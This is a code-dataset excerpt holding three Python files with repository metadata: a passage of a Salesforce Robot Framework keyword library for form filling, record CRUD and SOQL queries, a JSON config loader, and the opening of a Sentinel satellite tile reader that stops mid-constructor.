# This should never happen, yet it does. Experience has
# shown that sometimes (at least in spring '20) the modal
# never renders. Refreshing the modal seems to fix it.
if retry:
self.builtin.log(
f"caught exception {e} waiting for app launcher; retrying", "DEBUG"
)
self.selenium.press_keys("sf:modal.is_open", "ESCAPE")
self.wait_until_modal_is_closed()
self.open_app_launcher(retry=False)
else:
self.builtin.log(
"caught exception waiting for app launcher; not retrying", "DEBUG"
)
raise
def populate_field(self, name, value):
"""Enters a value into an input or textarea field.
        'name' represents the label on the page (e.g. "First Name"),
and 'value' is the new value.
Any existing value will be replaced.
"""
locator = self._get_input_field_locator(name)
self._populate_field(locator, value)
def populate_lookup_field(self, name, value):
"""Enters a value into a lookup field."""
input_locator = self._get_input_field_locator(name)
menu_locator = lex_locators["object"]["field_lookup_link"].format(value)
self._populate_field(input_locator, value)
for x in range(3):
self.wait_for_aura()
try:
self.selenium.get_webelement(menu_locator)
except ElementNotFound:
# Give indexing a chance to catch up
time.sleep(2)
field = self.selenium.get_webelement(input_locator)
field.send_keys(Keys.BACK_SPACE)
else:
break
self.selenium.set_focus_to_element(menu_locator)
self._jsclick(menu_locator)
self.wait_for_aura()
def _get_input_field_locator(self, name):
"""Given an input field label, return a locator for the related input field
This looks for a <label> element with the given text, or
a label with a span with the given text. The value of the
'for' attribute is then extracted from the label and used
to create a new locator with that id.
For example, the locator 'abc123' will be returned
for the following html:
<label for='abc123'>First Name</label>
-or-
<label for='abc123'><span>First Name</span>
"""
try:
# we need to make sure that if a modal is open, we only find
# the input element inside the modal. Otherwise it's possible
# that the xpath could pick the wrong element.
self.selenium.get_webelement(lex_locators["modal"]["is_open"])
modal_prefix = "//div[contains(@class, 'modal-container')]"
except ElementNotFound:
modal_prefix = ""
locator = modal_prefix + lex_locators["object"]["field_label"].format(
name, name
)
input_element_id = self.selenium.get_element_attribute(locator, "for")
return input_element_id
def _populate_field(self, locator, value):
self.builtin.log(f"value: {value}' locator: '{locator}'", "DEBUG")
field = self.selenium.get_webelement(locator)
self._focus(field)
if field.get_attribute("value"):
self._clear(field)
field.send_keys(value)
def _focus(self, element):
"""Set focus to an element
In addition to merely setting the focus, we click the mouse
to the field in case there are functions tied to that event.
"""
actions = ActionChains(self.selenium.driver)
actions.move_to_element(element).click().perform()
self.selenium.set_focus_to_element(element)
def _clear(self, element):
"""Clear the field, using any means necessary
This is surprisingly hard to do with a generic solution. Some
methods work for some components and/or on some browsers but
not others. Therefore, several techniques are employed.
"""
element.clear()
self.selenium.driver.execute_script("arguments[0].value = '';", element)
# Select all and delete just in case the element didn't get cleared
element.send_keys(Keys.HOME + Keys.SHIFT + Keys.END)
element.send_keys(Keys.BACKSPACE)
if element.get_attribute("value"):
# Give the UI a chance to settle down. The sleep appears
# necessary. Without it, this keyword sometimes fails to work
# properly. With it, I was able to run 700+ tests without a single
# failure.
time.sleep(0.25)
# Even after all that, some elements refuse to be cleared out.
# I'm looking at you, currency fields on Firefox.
if element.get_attribute("value"):
self._force_clear(element)
def _force_clear(self, element):
"""Use brute-force to clear an element
This moves the cursor to the end of the input field and
then issues a series of backspace keys to delete the data
in the field.
"""
value = element.get_attribute("value")
actions = ActionChains(self.selenium.driver)
actions.move_to_element(element).click().send_keys(Keys.END)
for character in value:
actions.send_keys(Keys.BACKSPACE)
actions.perform()
def populate_form(self, **kwargs):
"""Enters multiple values from a mapping into form fields."""
for name, value in kwargs.items():
self.populate_field(name, value)
def remove_session_record(self, obj_type, obj_id):
"""Remove a record from the list of records that should be automatically removed."""
try:
self._session_records.remove({"type": obj_type, "id": obj_id})
except ValueError:
self.builtin.log(
"Did not find record {} {} in the session records list".format(
obj_type, obj_id
)
)
def select_record_type(self, label):
"""Selects a record type while adding an object."""
self.wait_until_modal_is_open()
locator = lex_locators["object"]["record_type_option"].format(label)
self._jsclick(locator)
self.selenium.click_button("Next")
@capture_screenshot_on_error
def select_app_launcher_app(self, app_name):
"""Navigates to a Salesforce App via the App Launcher"""
locator = lex_locators["app_launcher"]["app_link"].format(app_name)
self.open_app_launcher()
self.selenium.wait_until_page_contains_element(locator, timeout=30)
self.selenium.set_focus_to_element(locator)
elem = self.selenium.get_webelement(locator)
link = elem.find_element_by_xpath("../../..")
self.selenium.set_focus_to_element(link)
link.click()
self.wait_until_modal_is_closed()
@capture_screenshot_on_error
def select_app_launcher_tab(self, tab_name):
"""Navigates to a tab via the App Launcher"""
locator = lex_locators["app_launcher"]["tab_link"].format(tab_name)
self.open_app_launcher()
self.selenium.wait_until_page_contains_element(locator)
self.selenium.set_focus_to_element(locator)
self._jsclick(locator)
self.wait_until_modal_is_closed()
def salesforce_delete(self, obj_name, obj_id):
"""Deletes a Salesforce object by object name and Id.
Example:
The following example assumes that ``${contact id}`` has been
previously set. The example deletes the Contact with that Id.
| Salesforce Delete Contact ${contact id}
"""
self.builtin.log("Deleting {} with Id {}".format(obj_name, obj_id))
obj_class = getattr(self.cumulusci.sf, obj_name)
obj_class.delete(obj_id)
self.remove_session_record(obj_name, obj_id)
def salesforce_get(self, obj_name, obj_id):
"""Gets a Salesforce object by Id and returns the result as a dict.
Example:
The following example assumes that ``${contact id}`` has been
previously set. The example retrieves the Contact object with
that Id and then logs the Name field.
| &{contact}= Salesforce Get Contact ${contact id}
| log Contact name: ${contact['Name']}
"""
self.builtin.log(f"Getting {obj_name} with Id {obj_id}")
obj_class = getattr(self.cumulusci.sf, obj_name)
return obj_class.get(obj_id)
def salesforce_insert(self, obj_name, **kwargs):
"""Creates a new Salesforce object and returns the Id.
The fields of the object may be defined with keyword arguments
where the keyword name is the same as the field name.
        The object name and Id are passed to the *Store Session
Record* keyword, and will be deleted when the keyword
*Delete Session Records* is called.
As a best practice, either *Delete Session Records* or
*Delete Records and Close Browser* from Salesforce.robot
should be called as a suite teardown.
Example:
The following example creates a new Contact with the
first name of "Eleanor" and the last name of "Rigby".
| ${contact id}= Salesforce Insert Contact
| ... FirstName=Eleanor
| ... LastName=Rigby
"""
self.builtin.log("Inserting {} with values {}".format(obj_name, kwargs))
obj_class = getattr(self.cumulusci.sf, obj_name)
res = obj_class.create(kwargs)
self.store_session_record(obj_name, res["id"])
return res["id"]
def _salesforce_generate_object(self, obj_name, **fields):
obj = {"attributes": {"type": obj_name}} # Object type to create
obj.update(fields)
return obj
def generate_test_data(self, obj_name, number_to_create, **fields):
"""Generate bulk test data
This returns an array of dictionaries with template-formatted
arguments which can be passed to the *Salesforce Collection Insert*
keyword.
You can use ``{{number}}`` to represent the unique index of
the row in the list of rows. If the entire string consists of
a number, Salesforce API will treat the value as a number.
Example:
The following example creates three new Contacts:
| @{objects} = Generate Test Data Contact 3
| ... Name=User {{number}}
| ... Age={{number}}
The example code will generate Contact objects with these fields:
| [{'Name': 'User 0', 'Age': '0'},
| {'Name': 'User 1', 'Age': '1'},
| {'Name': 'User 2', 'Age': '2'}]
        Python expression syntax is allowed, so computed templates such as ``{{1000 + number}}`` also work.
Python operators can be used, but no functions or variables are provided, so mostly you just
have access to mathematical and logical operators. The Python operators are described here:
https://www.digitalocean.com/community/tutorials/how-to-do-math-in-python-3-with-operators
Contact the CCI team if you have a use-case that
could benefit from more expression language power.
Templates can also be based on faker patterns like those described here:
https://faker.readthedocs.io/en/master/providers.html
Most examples can be pasted into templates verbatim:
| @{objects}= Generate Test Data Contact 200
| ... Name={{fake.first_name}} {{fake.last_name}}
| ... MailingStreet={{fake.street_address}}
| ... MailingCity=New York
| ... MailingState=NY
| ... MailingPostalCode=12345
| ... Email={{fake.email(domain="salesforce.com")}}
"""
objs = []
for i in range(int(number_to_create)):
formatted_fields = {
name: format_str(value, {"number": i}) for name, value in fields.items()
}
newobj = self._salesforce_generate_object(obj_name, **formatted_fields)
objs.append(newobj)
return objs
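    # Clarifying note (illustrative, values are placeholders): each dict
    # returned by Generate Test Data also carries the sObject type added by
    # _salesforce_generate_object, so the Contact example in the docstring
    # actually starts with an element shaped like:
    #
    #   {"attributes": {"type": "Contact"}, "Name": "User 0", "Age": "0"}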
def salesforce_collection_insert(self, objects):
"""Inserts records that were created with *Generate Test Data*.
_objects_ is a list of data, typically generated by the
*Generate Test Data* keyword.
A 200 record limit is enforced by the Salesforce APIs.
        The object name and Id are passed to the *Store Session
Record* keyword, and will be deleted when the keyword *Delete
Session Records* is called.
As a best practice, either *Delete Session Records* or
        *Delete Records and Close Browser* from Salesforce.robot
should be called as a suite teardown.
Example:
| @{objects}= Generate Test Data Contact 200
| ... FirstName=User {{number}}
| ... LastName={{fake.last_name}}
| Salesforce Collection Insert ${objects}
"""
        assert all(
            not obj.get("id", None) for obj in objects
        ), "Insertable objects should not have IDs"
assert len(objects) <= SF_COLLECTION_INSERTION_LIMIT, (
"Cannot insert more than %s objects with this keyword"
% SF_COLLECTION_INSERTION_LIMIT
)
records = self.cumulusci.sf.restful(
"composite/sobjects",
method="POST",
json={"allOrNone": True, "records": objects},
)
for idx, (record, obj) in enumerate(zip(records, objects)):
if record["errors"]:
raise AssertionError(
"Error on Object {idx}: {record} : {obj}".format(**vars())
)
self.store_session_record(obj["attributes"]["type"], record["id"])
obj["id"] = record["id"]
obj[STATUS_KEY] = record
return objects
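    # --- Editor's sketch (not part of the original library) -------------------
    # The raw HTTP call that the keyword above performs through
    # simple_salesforce: a POST to the Composite Collections endpoint.  The
    # instance URL, access token and API version below are placeholders, and
    # this standalone helper is hypothetical.
    @staticmethod
    def _example_collection_insert(instance_url, access_token, records,
                                   api_version="v52.0"):
        import requests  # assumed available; used only for this sketch
        response = requests.post(
            f"{instance_url}/services/data/{api_version}/composite/sobjects",
            headers={
                "Authorization": f"Bearer {access_token}",
                "Content-Type": "application/json",
            },
            json={"allOrNone": True, "records": records},
        )
        response.raise_for_status()
        # One result dict per record, e.g. {"id": "...", "success": True, "errors": []}
        return response.json()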
def salesforce_collection_update(self, objects):
"""Updates records described as Robot/Python dictionaries.
_objects_ is a dictionary of data in the format returned
by the *Salesforce Collection Insert* keyword.
A 200 record limit is enforced by the Salesforce APIs.
Example:
The following example creates ten accounts and then updates
the Rating from "Cold" to "Hot"
| ${data}= Generate Test Data Account 10
| ... Name=Account #{{number}}
| ... Rating=Cold
| ${accounts}= Salesforce Collection Insert ${data}
|
| FOR ${account} IN @{accounts}
| Set to dictionary ${account} Rating Hot
| END
| Salesforce Collection Update ${accounts}
"""
for obj in objects:
assert obj[
"id"
], "Should be a list of objects with Ids returned by Salesforce Collection Insert"
if STATUS_KEY in obj:
del obj[STATUS_KEY]
assert len(objects) <= SF_COLLECTION_INSERTION_LIMIT, (
"Cannot update more than %s objects with this keyword"
% SF_COLLECTION_INSERTION_LIMIT
)
records = self.cumulusci.sf.restful(
"composite/sobjects",
method="PATCH",
json={"allOrNone": True, "records": objects},
)
for record, obj in zip(records, objects):
obj[STATUS_KEY] = record
for idx, (record, obj) in enumerate(zip(records, objects)):
if record["errors"]:
raise AssertionError(
"Error on Object {idx}: {record} : {obj}".format(**vars())
)
def salesforce_query(self, obj_name, **kwargs):
"""Constructs and runs a simple SOQL query and returns a list of dictionaries.
By default the results will only contain object Ids. You can
specify a SOQL SELECT clause via keyword arguments by passing
a comma-separated list of fields with the ``select`` keyword
argument.
You can supply keys and values to match against
in keyword arguments, or a full SOQL where-clause
in a keyword argument named ``where``. If you supply
both, they will be combined with a SOQL "AND".
``order_by`` and ``limit`` keyword arguments are also
supported as shown below.
Examples:
The following example searches for all Contacts where the
first name is "Eleanor". It returns the "Name" and "Id"
fields and logs them to the robot report:
| @{records}= Salesforce Query Contact select=Id,Name
| ... FirstName=Eleanor
| FOR ${record} IN @{records}
| log Name: ${record['Name']} Id: ${record['Id']}
| END
Or with a WHERE-clause, we can look for the last contact where
the first name is NOT Eleanor.
| @{records}= Salesforce Query Contact select=Id,Name
| ... where=FirstName!='Eleanor'
| ... order_by=LastName desc
| ... limit=1
"""
query = self._soql_query_builder(obj_name, **kwargs)
self.builtin.log("Running SOQL Query: {}".format(query))
return self.cumulusci.sf.query_all(query).get("records", [])
def _soql_query_builder(
self, obj_name, select=None, order_by=None, limit=None, where=None, **kwargs
):
query = "SELECT "
if select:
query += select
else:
query += "Id"
query += " FROM {}".format(obj_name)
where_clauses = []
if where:
where_clauses = [where]
for key, value in kwargs.items():
where_clauses.append("{} = '{}'".format(key, value))
if where_clauses:
query += " WHERE " + " AND ".join(where_clauses)
if order_by:
query += " ORDER BY " + order_by
if limit:
assert int(limit), "Limit should be an integer"
query += f" LIMIT {limit}"
return query
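    # --- Editor's note (not part of the original library) ---------------------
    # Illustration of the SOQL string the builder above produces (assuming
    # ``sf_lib`` is an instance of this keyword library):
    #
    #   sf_lib._soql_query_builder(
    #       "Contact", select="Id,Name", FirstName="Eleanor",
    #       order_by="LastName", limit=1)
    #   # -> "SELECT Id,Name FROM Contact WHERE FirstName = 'Eleanor'
    #   #     ORDER BY LastName LIMIT 1"
    #
    # Note that keyword-argument values are interpolated into single quotes
    # verbatim, so values containing quotes should go through ``where``.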
def salesforce_update(self, obj_name, obj_id, **kwargs):
"""Updates a Salesforce object by Id.
The keyword returns the result from the underlying
        simple_salesforce ``update`` method, which is an HTTP
status code. As with `Salesforce Insert`, field values
are specified as keyword arguments.
The following example assumes that ${contact id} has been
previously set, and adds a Description to the given
contact.
        | ${result}=  Salesforce Update  Contact  ${contact id}
| ... Description=This Contact created during a test
| Should be equal as numbers ${result} 204
"""
self.builtin.log(
"Updating {} {} with values {}".format(obj_name, obj_id, kwargs)
)
obj_class = getattr(self.cumulusci.sf, obj_name)
return obj_class.update(obj_id, kwargs)
def soql_query(self, query):
"""Runs a simple SOQL query and returns the dict results
The _query_ parameter must be a properly quoted SOQL query statement. The
return value is a dictionary. The dictionary contains the keys
as documented for the raw API call. The most useful key is ``records``,
which contains a list of records which were matched by the query.
Example
The following example searches for all Contacts with a first
name of "Eleanor" and a last name of "Rigby", and then prints
the name of the first record found.
| ${result}= SOQL Query
| ... SELECT Name, Id FROM Contact WHERE FirstName='Eleanor' AND LastName='Rigby'
| Run keyword if len($result['records']) == 0 Fail No records found
|
| ${contact}= Get from list ${result['records']} 0
| Should be equal ${contact['Name']} Eleanor Rigby
"""
self.builtin.log("Running SOQL Query: {}".format(query))
return self.cumulusci.sf.query_all(query)
def store_session_record(self, obj_type, obj_id):
"""Stores a Salesforce record's Id for use in the *Delete Session Records* keyword.
This keyword is automatically called by *Salesforce Insert*.
"""
self.builtin.log("Storing {} {} to session records".format(obj_type, obj_id))
self._session_records.append({"type": obj_type, "id": obj_id})
@capture_screenshot_on_error
def wait_until_modal_is_open(self):
"""Wait for modal to open"""
self.selenium.wait_until_page_contains_element(
lex_locators["modal"]["is_open"],
timeout=15,
error="Expected to see a modal window, but didn't",
)
def wait_until_modal_is_closed(self):
"""Wait for modal to close"""
self.selenium.wait_until_page_does_not_contain_element(
lex_locators["modal"]["is_open"], timeout=15
)
def wait_until_loading_is_complete(self, locator=None):
"""Wait for LEX page to load.
(We're actually waiting for the actions ribbon to appear.)
"""
locator = lex_locators["body"] if locator is None else locator
try:
self.selenium.wait_until_page_contains_element(locator)
self.wait_for_aura()
# this knowledge article recommends waiting a second. I don't
# like it, but it seems to help. We should do a wait instead,
# but I can't figure out what to wait on.
# https://help.salesforce.com/articleView?id=000352057&language=en_US&mode=1&type=1
time.sleep(1)
except Exception:
try:
self.selenium.capture_page_screenshot()
except Exception as e:
self.builtin.warn("unable to capture screenshot: {}".format(str(e)))
raise
@capture_screenshot_on_error
def wait_until_salesforce_is_ready(self, locator=None, timeout=None, interval=5):
"""Waits until we are able to render the initial salesforce landing page
It will continue to refresh the page until we land on a
lightning page or until a timeout has been reached. The
timeout can be specified in any time string supported by robot
(eg: number of seconds, "3 minutes", etc.). If not specified,
the default selenium timeout will be used.
This keyword will wait a few seconds between each refresh, as
well as wait after each refresh for the page to fully render
(ie: it calls wait_for_aura())
"""
# Note: we can't just ask selenium to wait for an element,
        # because the org might not be available due to infrastructure
# issues (eg: the domain not being propagated). In such a case
# the element will never come. Instead, what we need to do is
# repeatedly refresh the page until the org responds.
#
# This assumes that any lightning page is a valid stopping
# point. If salesforce starts rendering error pages with
# lightning, or an org's default home page is not a lightning
# page, we may have to rethink that strategy.
timeout = timeout if timeout else self.selenium.get_selenium_timeout()
timeout_seconds = timestr_to_secs(timeout)
start_time = time.time()
login_url = self.cumulusci.login_url()
locator = lex_locators["body"] if locator is None else locator
while True:
try:
self.selenium.wait_for_condition(
"return (document.readyState == 'complete')"
)
self.wait_for_aura()
# If the following doesn't throw an error, we're good to go.
self.selenium.get_webelement(locator)
break
except Exception as e:
self.builtin.log(
"caught exception while waiting: {}".format(str(e)), "DEBUG"
)
if time.time() - start_time > timeout_seconds:
self.selenium.log_location()
raise Exception("Timed out waiting for a lightning page")
# known edge cases that can be worked around
if self._check_for_login_failure():
continue
elif self._check_for_classic():
continue
# not a known edge case; take a deep breath and
# try again.
time.sleep(interval)
self.selenium.go_to(login_url)
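    # --- Editor's sketch (not part of the original library) -------------------
    # The generic shape of the retry loop above: poll a readiness check,
    # refresh on failure, and give up after a wall-clock timeout.  ``check``
    # and ``refresh`` are caller-supplied callables; this helper is hypothetical.
    @staticmethod
    def _example_poll_until_ready(check, refresh, timeout_seconds=60, interval=5):
        import time  # matches the module-level import used above
        start = time.time()
        while True:
            try:
                check()  # should raise if the page is not ready yet
                return True
            except Exception:
                if time.time() - start > timeout_seconds:
                    raise Exception("Timed out waiting for the page to be ready")
                time.sleep(interval)
                refresh()  # e.g. navigate to the login URL again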
def breakpoint(self):
"""Serves as a breakpoint for the robot debugger
Note: this keyword is a no-op unless the debug option for
the task has been set to True. Unless the option has been
set, this keyword will have no effect on a running test.
"""
return None
def _check_for_classic(self):
"""Switch to lightning if we land on a classic page
This seems to happen randomly, causing tests to fail
catastrophically. The idea is to detect such a case and
auto-click the "switch to lightning" link
"""
try:
# we don't actually want to wait here, but if we don't
# explicitly wait, we'll implicitly wait longer than
# necessary. This needs to be a quick-ish check.
self.selenium.wait_until_element_is_visible(
"class:switch-to-lightning", timeout=2
)
self.builtin.log(
"It appears we are on a classic page; attempting to switch to lightning",
"WARN",
)
# this screenshot should be removed at some point,
# but for now I want to make sure we see what the
# page looks like if we get here.
self.selenium.capture_page_screenshot()
# just in case there's a modal present we'll try simulating
# the escape key. Then, click on the switch-to-lightning link
self.selenium.press_keys(None, "ESC")
self.builtin.sleep("1 second")
self.selenium.click_link("class:switch-to-lightning")
return True
except (NoSuchElementException, AssertionError):
return False
def _check_for_login_failure(self):
"""Handle the case where we land on a login screen
Sometimes we get redirected to a login URL rather than
being logged in, and we've yet to figure out precisely why
that happens. Experimentation shows that authentication has
already happened, so in this case we'll try going back to
the instance url rather than the front door servlet.
Admittedly, this is a bit of a hack, but it's better than
never getting past this redirect.
"""
location = self.selenium.get_location()
if "//test.salesforce.com" in location or "//login.salesforce.com" in location:
login_url = self.cumulusci.org.config["instance_url"]
self.builtin.log(f"setting login_url temporarily to {login_url}", "DEBUG")
self.selenium.go_to(login_url)
return True
return False
def elapsed_time_for_last_record(
self, obj_name, start_field, end_field, order_by, **kwargs
):
"""For records representing jobs or processes, compare the record's start-time to its end-time to see how long a process took.
Arguments:
obj_name: SObject to look for last record
start_field: Name of the datetime field that represents the process start
end_field: Name of the datetime field that represents the process end
order_by: Field name to order by. Should be a datetime field, and usually is just the same as end_field.
where: Optional Where-clause to use for filtering
        Other keyword arguments are used for filtering, as in the Salesforce Query keyword.
        The last matching record is queried and summarized.
Example:
${time_in_seconds} = Elapsed Time For Last Record
... obj_name=AsyncApexJob
... where=ApexClass.Name='BlahBlah'
... start_field=CreatedDate
... end_field=CompletedDate
... order_by=CompletedDate
"""
if len(order_by.split()) != 1:
raise Exception("order_by should be a simple field name")
query = self._soql_query_builder(
obj_name,
select=f"{start_field}, {end_field}",
order_by=order_by + " DESC NULLS LAST",
limit=1,
**kwargs,
)
response = self.soql_query(query)
results = response["records"]
if results:
record = results[0]
return _duration(record[start_field], record[end_field], record)
else:
raise Exception(f"Matching record not found: {query}")
def start_performance_timer(self):
"""Start an elapsed time stopwatch for performance tests.
        See the documentation for *Stop Performance Timer* for more
information.
Example:
Start Performance Timer
Do Something
Stop Performance Timer
"""
BuiltIn().set_test_variable("${__start_time}", datetime.now())
def stop_performance_timer(self):
"""Record the results of a stopwatch. For perf testing.
This keyword uses Set Test Elapsed Time internally and therefore
outputs in all of the ways described there.
Example:
Start Performance Timer
Do Something
Stop Performance Timer
"""
builtins = BuiltIn()
start_time = builtins.get_variable_value("${__start_time}")
if start_time:
seconds = (datetime.now() - start_time).seconds
assert seconds is not None
self.set_test_elapsed_time(seconds)
else:
raise Exception(
"Elapsed time clock was not started. "
"Use the Start Elapsed Time keyword to do so."
)
def set_test_elapsed_time(self, elapsedtime):
"""This keyword captures a computed rather than measured elapsed time for performance tests.
For example, if you were performance testing a Salesforce batch process, you might want to
store the Salesforce-measured elapsed time of the batch process instead of the time measured
in the CCI client process.
The keyword takes a single argument which is either a number of seconds or a Robot time string
(https://robotframework.org/robotframework/latest/libraries/DateTime.html#Time%20formats).
Using this keyword will automatically add the tag cci_metric_elapsed_time to the test case
and ${cci_metric_elapsed_time} to the test's variables. cci_metric_elapsed_time is not
included in Robot's html statistical roll-ups.
Example:
Set Test Elapsed Time 11655.9
Performance test times are output in the CCI logs and are captured in MetaCI instead of the
"total elapsed time" measured by Robot Framework. The Robot "test message" is also updated."""
builtins = BuiltIn()
try:
seconds = float(elapsedtime)
except ValueError:
seconds = timestr_to_secs(elapsedtime)
assert seconds is not None
builtins.set_test_message(f"Elapsed time set by test : {seconds}")
builtins.set_tags("cci_metric_elapsed_time")
builtins.set_test_variable("${cci_metric_elapsed_time}", seconds)
def set_test_metric(self, metric: str, value=None):
"""This keyword captures any metric for performance monitoring.
For example: number of queries, rows processed, CPU usage, etc.
The keyword takes a metric name, which can be any string, and a value, which
can be any number.
Using this keyword will automatically add the tag cci_metric to the test case
and ${cci_metric_<metric_name>} to the test's variables. These permit downstream
processing in tools like CCI and MetaCI.
cci_metric is not included in Robot's html statistical roll-ups.
Example:
| Set Test Metric Max_CPU_Percent 30
Performance test metrics are output in the CCI logs, log.html and output.xml.
MetaCI captures them but does not currently have a user interface for displaying
them."""
builtins = BuiltIn()
value = float(value)
builtins.set_tags("cci_metric")
builtins.set_test_variable("${cci_metric_%s}" % metric, value)
@capture_screenshot_on_error
def input_form_data(self, *args):
"""Fill in one or more labeled input fields fields with data
Arguments should be pairs of field labels and values. Labels
for required fields should not include the asterisk. Labels
must be exact, including case.
This keyword uses the keyword *Locate Element by Label* to
locate elements. More details about how elements are found are
in the documentation for that keyword.
For most input form fields the actual value string will be
used. For a checkbox, passing the value "checked" will check
the checkbox and any other value will uncheck it. Using
"unchecked" is recommended for clarity.
Example:
| Input form data
| ... Opportunity Name The big one # required text field
| ... Amount 1b # currency field
| ... Close Date 4/01/2022 # date field
| ... Private checked # checkbox
| ... Type New Customer # combobox
| ... Primary Campaign Source The Big Campaign # picklist
This keyword will eventually replace the "populate form"
keyword once it has been more thoroughly tested in production.
"""
it = iter(args)
errors = []
for label, value in list(zip(it, it)):
# this uses our custom "label" locator strategy
locator = f"label:{label}"
# FIXME: we should probably only wait for the first label;
# after that we can assume the fields have been rendered
# so that we fail quickly if we can't find the element
element = self.selenium.get_webelement(locator)
handler = get_form_handler(element, locator)
try:
if handler:
handler.set(value)
else:
raise Exception(
f"No form handler found for tag '{element.tag_name}'"
)
except Exception as e:
errors.append(f"{label}: {str(e)}")
if errors:
message = "There were errors with the following fields:\n"
message += "\n".join(errors)
raise Exception(message)
# FIXME: maybe we should automatically set the focus to some
# other element to trigger any event handlers on the last
# element? But what should we set the focus to?
def locate_element_by_label(self, browser, locator, tag, constraints):
"""Find a lightning component, input, or textarea based on a label
If the component is inside a fieldset, the fieldset label can
be prefixed to the label with a double colon in order to
disambiguate the label. (eg: Other address::First Name)
        If the label is inside nested lightning components (eg:
``<lightning-input>...<lightning-combobox>...<label>``), the
lightning component closest to the label will be
returned (in this case, ``lightning-combobox``).
If a lightning component cannot be found for the label, an
attempt will be made to find an input or textarea associated
with the label.
This is registered as a custom locator strategy named "label"
Example:
        The following example is for a form with a fieldset named
"Expected Delivery Date", and inside of that a date input field
with a label of "Date".
These examples produce identical results:
| ${element}= Locate element by label Expected Delivery Date::Date
| ${element}= Get webelement label:Expected Delivery Date::Date
"""
if "::" in locator:
fieldset, label = [x.strip() for x in locator.split("::", 1)]
fieldset_prefix = f'//fieldset[.//*[.="{fieldset}"]]'
else:
label = locator
fieldset_prefix = ""
xpath = fieldset_prefix + (
# a label with the given text, optionally with a leading
# or trailing "*" (ie: required field)
f'//label[.="{label}" or .="*{label}" or .="{label}*"]'
# then find the nearest ancestor lightning component
'/ancestor::*[starts-with(local-name(), "lightning-")][1]'
)
elements = browser.find_elements_by_xpath(xpath)
if not elements:
# fall back to finding an input or textarea based on the 'for'
# attribute of a label
xpath = fieldset_prefix + (
"//*[self::input or self::textarea]"
f'[@id=string(//label[.="{label}" or .="*{label}" or .="{label}*"]/@for)]'
)
elements = browser.find_elements_by_xpath(xpath)
return elements
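# --- Editor's note (not part of the original library) -------------------------
# For the locator "Expected Delivery Date::Date", the label strategy above
# builds (approximately) the following XPath before falling back to the
# input/textarea variant:
#
#   //fieldset[.//*[.="Expected Delivery Date"]]
#       //label[.="Date" or .="*Date" or .="Date*"]
#       /ancestor::*[starts-with(local-name(), "lightning-")][1]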
def _duration(start_date: str, end_date: str, record: dict):
try:
start_date = parse_date(start_date)
end_date = parse_date(end_date)
except (ParserError, TypeError) as e:
raise Exception(f"Date parse error: {e} in record {record}")
duration = end_date - start_date
return duration.total_seconds()
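# --- Editor's note (not part of the original library) -------------------------
# Example of the duration helper above with ISO-8601 timestamps of the kind
# returned by the Salesforce API (assuming ``parse_date`` is dateutil's parser,
# as the ParserError handling suggests):
#
#   _duration("2021-06-01T10:00:00.000+0000",
#             "2021-06-01T10:05:30.000+0000", record={})
#   # -> 330.0  (seconds)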
| 40.115885
| 134
| 0.628242
|
eaed9abeb02fdcf770a7bebf99b9d65ae0d1d965
| 1,740
|
py
|
Python
|
util/config_util.py
|
Genpeng/order-sales-forecast
|
c89269817a0d936900e5deb9bcc2f9a0d885382d
|
[
"Apache-2.0"
] | 3
|
2019-12-29T16:18:26.000Z
|
2020-07-05T15:39:27.000Z
|
util/config_util.py
|
Genpeng/order-sales-forecast
|
c89269817a0d936900e5deb9bcc2f9a0d885382d
|
[
"Apache-2.0"
] | null | null | null |
util/config_util.py
|
Genpeng/order-sales-forecast
|
c89269817a0d936900e5deb9bcc2f9a0d885382d
|
[
"Apache-2.0"
] | null | null | null |
# _*_ coding: utf-8 _*_
"""
Some utility functions about loading configuration file.
Author: Genpeng Xu
"""
import json
import argparse
from bunch import Bunch
def get_config_from_json(json_file):
"""
Get the configuration by reading the `json_file` and return a Bunch object,
which is attribute-style dictionary.
Argument:
json_file : str, the path to get configuration file
Return:
config : Bunch, an attribute-style dictionary object
config_dict : dict, a dictionary whose elements represent the names and its corresponding
values of configurations
"""
with open(json_file, 'r') as config_file:
config_dict = json.load(config_file)
config = Bunch(config_dict)
return config, config_dict
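# --- Editor's note (not part of the original file) ----------------------------
# Example of the expected layout; the file name and keys are illustrative only:
#
#   config.json:
#     {"model_config": {"learning_rate": 0.001, "num_epochs": 10}}
#
#   config, config_dict = get_config_from_json("config.json")
#   config.model_config          # attribute-style access via Bunch
#   config_dict["model_config"]  # plain dictionary access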
def process_config(json_file):
config, _ = get_config_from_json(json_file)
return config
def get_args():
parser = argparse.ArgumentParser(description="Get the path of configuration file.")
parser.add_argument('-c', '--config',
dest='config',
metavar='config_path',
                        default=None,
help="Specify the path to the configuration file.")
args = parser.parse_args()
return args, parser
def main():
print("[INFO] Start parsing configuration file...")
parser, config = None, None
try:
args, parser = get_args() # get the path of configuration file
config = process_config(args.config)
except Exception as e:
print(e)
if parser:
parser.print_help()
        exit(1)
print(config.model_config)
print(type(config.model_config))
if __name__ == '__main__':
main()
| 25.588235
| 97
| 0.637931
|
00f054c2c63d69d6550b1df311221a60226ed63b
| 9,928
|
py
|
Python
|
sentinel_dataset/tile.py
|
ESA-PhiLab/NGVEO
|
d6346a9289f40b46f3f2c40cbb07e6afad3fbd29
|
[
"MIT"
] | 35
|
2018-10-30T07:11:29.000Z
|
2022-03-20T10:43:40.000Z
|
sentinel_dataset/tile.py
|
ESA-PhiLab/NGVEO
|
d6346a9289f40b46f3f2c40cbb07e6afad3fbd29
|
[
"MIT"
] | 5
|
2019-01-21T13:18:48.000Z
|
2022-03-11T23:32:23.000Z
|
sentinel_dataset/tile.py
|
ESA-PhiLab/NGVEO
|
d6346a9289f40b46f3f2c40cbb07e6afad3fbd29
|
[
"MIT"
] | 8
|
2018-12-20T15:42:42.000Z
|
2021-05-04T20:46:09.000Z
|
from __future__ import print_function
import json
import os
import numpy as np
from sentinel_dataset._utils import parse_eodata_folder_name
import rasterio
class Tile(object):
""" Utilities for reading tile objects"""
data_prefix = 'data_'
key_prefix_label = 'lbl_'
key_meta_data = 'meta_data'
# key_cloud_mask = 'cloud_mask'
def __init__(self, path, win=[512,512], key_missing_mask=None):
""" Constructor """
self.path = path
self.name = self.path.strip('/').split('/')[-2]
self.key_missing_mask = key_missing_mask
print(' - DataFile: Opening', self.name, self.path)
#Load meta data
with np.load( os.path.join(self.path, 'meta_data.npz')) as f:
try:
self.meta_data = f['meta_data'][()]
            except KeyError:
self.meta_data = f['metadata'][()]
#Set the missing mask
if self.meta_data['sensor'] == "Sentinel-1":
self.key_missing_mask = "layover_mask"
else:
self.key_missing_mask = "cloud_mask"
# Get shape
self.shape = self.meta_data['shape']
#Load list of labelled pixels
